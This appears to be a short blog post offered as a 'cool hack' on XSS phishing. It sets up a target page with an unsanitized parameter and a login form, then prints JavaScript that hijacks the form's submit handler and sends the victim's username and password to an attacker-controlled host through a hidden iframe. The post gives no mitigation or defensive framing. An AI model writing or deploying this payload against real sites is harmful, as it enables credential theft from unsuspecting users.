Xss Phishing

Xss Phishing

Xss Phishing

Here have constant reporting for phishing so tried to get a cool hack for you guys,
as these hacks are becoming more and more famous day by day,
the vulnerabilities are growing and so the hackers activates,
but we first start with XSS.

XSS are certainly changing the away that Phishing attacks are perpetrated.

for example we have a target as :-
http://Thewebsite.com/google/add.php?request=

Suppose, there is a login form and a XSS vulnerability in the
same page.
In order to perpetrate the phishing attack one need to inject JavaScript code in the
variable to make that the victim’s browser load a JavaScript file.
From a brief analyses at the HTML that the site generates I know that :

• The value that the variable “request” receives is not sanitized at all.

• The login form is named “login_clientes”

• The login form have two input fields for user data: “user” and “pass”.

So I will use the following JavaScript code:

<pre>loginForm = document.forms['login_clientes'];
function parseData()
{
var username = loginForm.user.value;
var password = loginForm.pass.value;
saveData(username,password);
return true;
}
function saveData(username,password)
{
var frame=document.createElement('iframe');
frame.src="<a href="http://myhost/myparsefile.php?username=%22">http://myhost/myparsefile.php?username="</a> + username + "&password=" +
password;
frame.style.display='none';
document.body.appendChild(frame);
}
loginForm.onsubmit = parseData;</pre>
abhijeet on Facebookabhijeet on Linkedinabhijeet on Twitter
abhijeet
abhijeet
Abhijeet specializes in developing software. A full-stack developer and Entrepreneur, he takes an idea and crafts it into a beautiful product - front to back. He develops on the LAMP Stack (PHP, MVC, Web API, Perl, Python, Azure, AWS, Google Cloud) and utilizes AngularJS and Angular Material for a structured client. Abhijeet is a self-starter with experience working in remote, agile environments mainly focusing on the security constraints. This is the developer, Project Manager and Consultant you are looking for.